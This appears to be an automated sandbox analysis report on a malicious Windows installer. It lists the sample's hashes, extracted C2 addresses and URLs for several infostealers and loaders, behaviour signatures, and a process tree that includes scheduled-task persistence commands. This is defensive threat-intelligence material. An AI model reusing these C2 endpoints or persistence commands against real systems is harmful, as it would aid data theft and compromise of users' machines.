Analysis
-
max time kernel
1049s -
max time network
1048s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
01-05-2024 18:35
General
-
Target
1714588385.7011812_setup.exe
-
Size
2.5MB
-
MD5
6bd1b5e6664b5cef6bc29d6215eb5eed
-
SHA1
56d094f696e070729f95e1d5d31c3c29f82f0a68
-
SHA256
df2f9be4da5739c5b409ceaf5bf7a7be7a3bc0020328c7ea1c22fe4b3a6d68e2
-
SHA512
3193dec08f9936a2c483b42ac42d9e57ca40dd64d1ea53d487c6ac4917003fe6efa96fc0068c30a1466b1b6a3ae8c6fd917c801d3d4c09a79fad890704c39342
-
SSDEEP
49152:3pPI++rXvuXiXLc4NohtwN7kyqK13jmBTyK0ov7su0C4:3pHWvj7u2GyrVumK0ol4
Malware Config
Extracted
risepro
147.45.47.93:58709
193.233.132.253:50500
193.233.132.226:50500
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.96:28380
Extracted
stealc
Extracted
vidar
9.3
03cea2609023d13f145ac6c5dc897112
https://steamcommunity.com/profiles/76561199680449169
https://t.me/r1g1o
-
profile_id_v2
03cea2609023d13f145ac6c5dc897112
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
lumma
https://alcojoldwograpciw.shop/api
https://productivelookewr.shop/api
https://tolerateilusidjukl.shop/api
https://shatterbreathepsw.shop/api
https://shortsvelventysjo.shop/api
https://incredibleextedwj.shop/api
https://liabilitynighstjsko.shop/api
https://demonstationfukewko.shop/api
Extracted
socks5systemz
http://buhefoc.com/search/?q=67e28dd86e54a179130af94d7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa49e8889b5e4fa9281ae978a371ea771795af8e05c645db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608ffb14c8e793993f
http://buhefoc.com/search/?q=67e28dd86e54a179130af94d7c27d78406abdd88be4b12eab517aa5c96bd86e9958e49855a8bbc896c58e713bc90c91c36b5281fc235a925ed3e00d6bd974a95129070b616e96cc92be510b866db52b2e34aec4c2b14a82966836f23d7f210c7ee919f33c5699512
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect Vidar Stealer 3 IoCs
-
Detect ZGRat V1 1 IoCs
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
Modifies firewall policy service 2 TTPs 2 IoCs
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Stealc
Stealc is an infostealer written in C++.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 52 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 49 IoCs
-
Identifies Wine through registry keys 2 TTPs 21 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 8 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 17 IoCs
Detects Themida, an advanced Windows software protection system.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Drops Chrome extension 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 16 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 41 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 21 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 19 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1714588385.7011812_setup.exe"C:\Users\Admin\AppData\Local\Temp\1714588385.7011812_setup.exe"1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\SimpleAdobe\7x7HQcFLbtah8kw7nPssxxZr.exeC:\Users\Admin\Documents\SimpleAdobe\7x7HQcFLbtah8kw7nPssxxZr.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-O11J1.tmp\7x7HQcFLbtah8kw7nPssxxZr.tmp"C:\Users\Admin\AppData\Local\Temp\is-O11J1.tmp\7x7HQcFLbtah8kw7nPssxxZr.tmp" /SL5="$701F4,4844569,54272,C:\Users\Admin\Documents\SimpleAdobe\7x7HQcFLbtah8kw7nPssxxZr.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe"C:\Users\Admin\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe"C:\Users\Admin\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -s4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 14005⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\aj9Gjz_zsnwG5_ngX31mN2Go.exeC:\Users\Admin\Documents\SimpleAdobe\aj9Gjz_zsnwG5_ngX31mN2Go.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 3243⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\dC1IuctNFzvsh2zJSlXUiiJH.exeC:\Users\Admin\Documents\SimpleAdobe\dC1IuctNFzvsh2zJSlXUiiJH.exe2⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 13283⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\p6c2MG8zd1HDfVME7qpS6mk4.exeC:\Users\Admin\Documents\SimpleAdobe\p6c2MG8zd1HDfVME7qpS6mk4.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 2923⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\7oq5Zv77dx7tgEAnEdtl06HD.exeC:\Users\Admin\Documents\SimpleAdobe\7oq5Zv77dx7tgEAnEdtl06HD.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 22804⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\5SzWu8Y46eNnOunW7rb5B_T1.exeC:\Users\Admin\Documents\SimpleAdobe\5SzWu8Y46eNnOunW7rb5B_T1.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbefe5ab58,0x7ffbefe5ab68,0x7ffbefe5ab784⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2100 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3076 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4248 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4624 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4740 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5304 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 --field-trial-handle=1896,i,9211804914023581665,16029258895786523625,131072 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbefd046f8,0x7ffbefd04708,0x7ffbefd047184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15851427618162835417,16943537674430953460,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,15851427618162835417,16943537674430953460,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,15851427618162835417,16943537674430953460,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15851427618162835417,16943537674430953460,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15851427618162835417,16943537674430953460,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15851427618162835417,16943537674430953460,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15851427618162835417,16943537674430953460,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,15851427618162835417,16943537674430953460,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:14⤵
-
C:\Users\Admin\Documents\SimpleAdobe\4M_G1aTRnXM52TYgQ2bD2KBa.exeC:\Users\Admin\Documents\SimpleAdobe\4M_G1aTRnXM52TYgQ2bD2KBa.exe2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanBfHpufHmetoO\xJ6t4kQdRqmTOPm2AHea.exe"C:\Users\Admin\AppData\Local\Temp\spanBfHpufHmetoO\xJ6t4kQdRqmTOPm2AHea.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\1000016001\105f405583.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\105f405583.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account6⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbf4b7ab58,0x7ffbf4b7ab68,0x7ffbf4b7ab787⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1712,i,8859267924243419320,11417621655791344608,131072 /prefetch:27⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1712,i,8859267924243419320,11417621655791344608,131072 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2000 --field-trial-handle=1712,i,8859267924243419320,11417621655791344608,131072 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=1712,i,8859267924243419320,11417621655791344608,131072 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3160 --field-trial-handle=1712,i,8859267924243419320,11417621655791344608,131072 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4328 --field-trial-handle=1712,i,8859267924243419320,11417621655791344608,131072 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=1712,i,8859267924243419320,11417621655791344608,131072 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 --field-trial-handle=1712,i,8859267924243419320,11417621655791344608,131072 /prefetch:87⤵
-
C:\Users\Admin\1000017002\4fd05124f5.exe"C:\Users\Admin\1000017002\4fd05124f5.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
